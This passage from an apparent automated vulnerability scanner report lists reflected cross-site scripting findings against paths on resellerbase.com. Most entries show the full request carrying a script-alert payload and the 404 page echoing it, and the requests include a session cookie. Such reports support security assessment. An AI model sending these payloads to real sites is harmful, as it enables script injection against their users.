User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/rating/?da9ca<script>alert(1)</script>a373de9001d=1 was not found on this server.</p>
...[SNIP]...

2.5296. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/3half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a09e0<script>alert(1)</script>3dcba84e99e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicea09e0<script>alert(1)</script>3dcba84e99e/software-scripts/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicea09e0<script>alert(1)</script>3dcba84e99e/software-scripts/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5297. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/3half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2ad00<script>alert(1)</script>8d3dcad74e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts2ad00<script>alert(1)</script>8d3dcad74e1/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts2ad00<script>alert(1)</script>8d3dcad74e1/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5298. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/3half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 322d7<script>alert(1)</script>880a98724dd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes322d7<script>alert(1)</script>880a98724dd/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes322d7<script>alert(1)</script>880a98724dd/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5299. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/3half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6e00a<script>alert(1)</script>ff315c06af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos6e00a<script>alert(1)</script>ff315c06af/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos6e00a<script>alert(1)</script>ff315c06af/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5300. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/3half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 77605<script>alert(1)</script>86c50ebd872 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images77605<script>alert(1)</script>86c50ebd872/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images77605<script>alert(1)</script>86c50ebd872/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5301. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/3half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 687c0<script>alert(1)</script>71fe2acc7ae was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/rating687c0<script>alert(1)</script>71fe2acc7ae/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/rating687c0<script>alert(1)</script>71fe2acc7ae/3half.gif was not found on this server.</p>
...[SNIP]...

2.5302. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/3half.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 3f0d1<script>alert(1)</script>e601c12a770 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/rating/3half.gif3f0d1<script>alert(1)</script>e601c12a770 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/rating/3half.gif3f0d1<script>alert(1)</script>e601c12a770 was not found on this server.</p>
...[SNIP]...

2.5303. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/3half.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/rating/3half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 12978<script>alert(1)</script>c18f9c15c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/rating/3half.gif?12978<script>alert(1)</script>c18f9c15c6=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/rating/3half.gif?12978<script>alert(1)</script>c18f9c15c6=1 was not found on this server.</p>
...[SNIP]...

2.5304. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3ded8<script>alert(1)</script>2f48af2f4b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service3ded8<script>alert(1)</script>2f48af2f4b1/software-scripts/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service3ded8<script>alert(1)</script>2f48af2f4b1/software-scripts/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5305. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2763d<script>alert(1)</script>46982f3112d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts2763d<script>alert(1)</script>46982f3112d/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts2763d<script>alert(1)</script>46982f3112d/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5306. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 57ff8<script>alert(1)</script>a5f2e11cbba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes57ff8<script>alert(1)</script>a5f2e11cbba/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes57ff8<script>alert(1)</script>a5f2e11cbba/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5307. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c1757<script>alert(1)</script>f284620fa7c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmosc1757<script>alert(1)</script>f284620fa7c/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmosc1757<script>alert(1)</script>f284620fa7c/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5308. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 865a4<script>alert(1)</script>5f9b5412b9b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images865a4<script>alert(1)</script>5f9b5412b9b/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images865a4<script>alert(1)</script>5f9b5412b9b/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5309. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 2f278<script>alert(1)</script>2ee5466f308 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/rating2f278<script>alert(1)</script>2ee5466f308/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/rating2f278<script>alert(1)</script>2ee5466f308/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5310. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload f898a<script>alert(1)</script>7c8489f2f0a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/rating/search.phpf898a<script>alert(1)</script>7c8489f2f0a?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/rating/search.phpf898a<script>alert(1)</script>7c8489f2f0a?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5311. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload b97b3<a>19c9550c8a was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchb97b3<a>19c9550c8a&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchb97b3<a>19c9550c8a&opt=2 was not found on this server.</p>
...[SNIP]...

2.5312. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 5c373<a>77574af6728 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/themes/kosmos/images/rating/search.php?keyword=search...5c373<a>77574af6728&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/rating/search.php?keyword=search...5c373<a>77574af6728&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5313. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/rating/search.php

Issue detail

